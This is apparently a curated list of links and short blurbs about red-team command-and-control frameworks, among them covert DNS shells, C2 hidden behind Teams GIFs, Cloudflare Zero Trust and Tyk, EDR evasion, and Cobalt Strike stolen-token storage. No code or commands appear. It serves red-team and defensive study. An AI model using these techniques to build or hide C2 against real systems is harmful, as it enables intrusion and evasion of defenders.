https://github.com/pucarasec/zuthaka

#C2 #RedTeam

Awesome CobaltStrike

https://github.com/zer0yu/Awesome-CobaltStrike

#CobaltStrike #C2 #RedTeam

https://youtu.be/FiT7-zxQGbo

#c2 #cpp

C3

Custom Command and Control (C3). A framework for rapid prototyping of custom C2 channels, while still providing integration with existing offensive toolkits.

https://github.com/FSecureLABS/C3

#c2 #cobaltstrike #redteam

Taking the pain out of C2 Infrastructure

# https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure
# https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure-3c4

#c2 #redteam #infrastructure

DNS-Black-Cat

Multi-platform toolkit for an interactive C2C DNS shell, by using DNS-Black-Cat, you will be able to execute system commands in shell mode over a fully encrypted covert channel.

https://github.com/lawrenceamer/dns-black-cat

#c2 #dns #redteam

GoWard

GoWard proxies HTTP C2 traffic to specified Red Team servers based on the HTTP header of the traffic.

https://github.com/chdav/GoWard

#c2 #proxy #redteam

Red Teaming Toolkit

A collection of open source and commercial tools that aid in red team operations. This post will help you during red team engagement.

Contents
— Reconnaissance
— Weaponization
— Delivery
— Command and Control
— Lateral Movement
— Establish Foothold
— Escalate Privileges
— Data Exfiltration
— Misc
— References

https://renatoborbolla.medium.com/red-teaming-adversary-simulation-toolkit-da89b20cb5ea

#redteam #toolkit #powershell #c2

🦠 Hiding C2 Traffic Using Tyk.io

A small article on the topic of hiding your malicious C2 traffic through of the TYK cloud API management service domains.
Tyk API gateway will let you manage your API ingress and routing them to different endpoints, some of them could be internally but some of them could be publicly exposed, and you can add some controls for authentication purposes while calling one of your APIs.

🔗 https://shells.systems/oh-my-api-abusing-tyk-cloud-api-management-service-to-hide-your-malicious-c2-traffic/

#c2 #rederectors #trafic #redteam

😡 Brute-Ratel-C4-Community-Kit

This repository contains scripts, configurations and deprecated payload loaders for Brute Ratel C4. Anything which is added in the deprecated folder will not be a part of the latest release of BRc4.

https://github.com/paranoidninja/Brute-Ratel-C4-Community-Kit

#c2 #bof #shellcode #injection

⚔️ Maelstrom: C2 Development Blog Series

We wanted to explore how C2s function in 2022, what evasive behavior's are required, and what a minimum viable C2 looks like in a world of sophisticated endpoint protection.

Which gave us our goals for this blog series:

- Document the internals of a minimum viable C2:
* What are the ideas behind popular C2 implementations?
* What are their goals and objectives?
- Analyse and implement evasive behaviors:
* What is required to run on a contemporary Windows system?
* What is required to bypass up-to-date, modern endpoint protection?
- Produce a proof-of-concept C2:
* What is the minimum viable C2 for an operator in 2022?
* What is required to detect this minimum viable C2?

🔗 Maelstrom: An Introduction
🔗 Maelstrom: The C2 Architecture
🔗 Maelstrom: Building the Team Server
🔗 Maelstrom: Writing a C2 Implant
🔗 Maelstrom: EDR Kernel Callbacks, Hooks, and Call Stacks

#maldev #c2

🔴 Reversing BRc4 Red-Teaming Tool Used by APT 29

On May 19, a malicious payload associated with Brute Ratel C4 (BRc4) was uploaded to VirusTotal, where it received a benign verdict from all 56 vendors that evaluated it. Beyond the obvious detection concerns, we believe this sample is also significant in terms of its malicious payload, command and control (C2), and packaging.

Blog post:
https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/

Reversing the Malware by IppSec:
https://youtu.be/a7W6rhkpVSM

#maldev #c2 #brc4

🪲 Abuse Cloudflare Zerotrust for C2 channels

https://0xsp.com/offensive/red-ops-techniques/abuse-cloudflare-zerotrust-for-c2-channels/

#c2 #cloudflare #zerotrust #redteam

🔑 Cobalt Strike Token Vault

This Beacon Object File (BOF) creates in-memory storage for stolen/duplicated Windows access tokens allow you to:

— Hot swap/re-use already stolen tokens without re-duplicating;
— Store tokens for later use in case of a person log out.

https://github.com/Henkru/cs-token-vault

#ad #tokens #c2 #cobalt #redteam

⚔️ Microsoft Teams C2 — Covert Attack Chain Utilizing GIFShell

Seven different insecure design elements/vulnerabilities present in Microsoft Teams, can be leveraged by an attacker, to execute a reverse shell between an attacker and victim, where no communication is directly exchanged between an attacker and a victim, but is entirely piped through malicious GIFs sent in Teams messages, and Out of Bounds (OOB) lookups of GIFs conducted by Microsoft’s own servers. This unique C2 infrastructure can be leveraged by sophisticated threat actors to avoid detection by EDR and other network monitoring tools. Particularly in secure network environments, where Microsoft Teams might be one of a handful of allowed, trusted hosts and programs, this attack chain can be particularly devastating.

Source:
https://medium.com/@bobbyrsec/gifshell-covert-attack-chain-and-c2-utilizing-microsoft-teams-gifs-1618c4e64ed7

#c2 #teams #gifshell #edr #redteam

🔥 NimPlant С2

This is a new light-weight, first-stage C2 implant written in Nim, with a supporting Python server and Next.JS web GUI.

https://github.com/chvancooten/NimPlant

#c2 #nim #python #redteam

😴 Creating Object File Monstrosities with Sleep Mask and LLVM

The Mutator kit is now part of the Cobalt Strike Arsenal Kit. It allows you to mutate BOFs, sleep masks and more with LLVM.

Read about it on the blog:
🔗 https://www.cobaltstrike.com/blog/introducing-the-mutator-kit-creating-object-file-monstrosities-with-sleep-mask-and-llvm

#c2 #sleepmask #llvm #redteam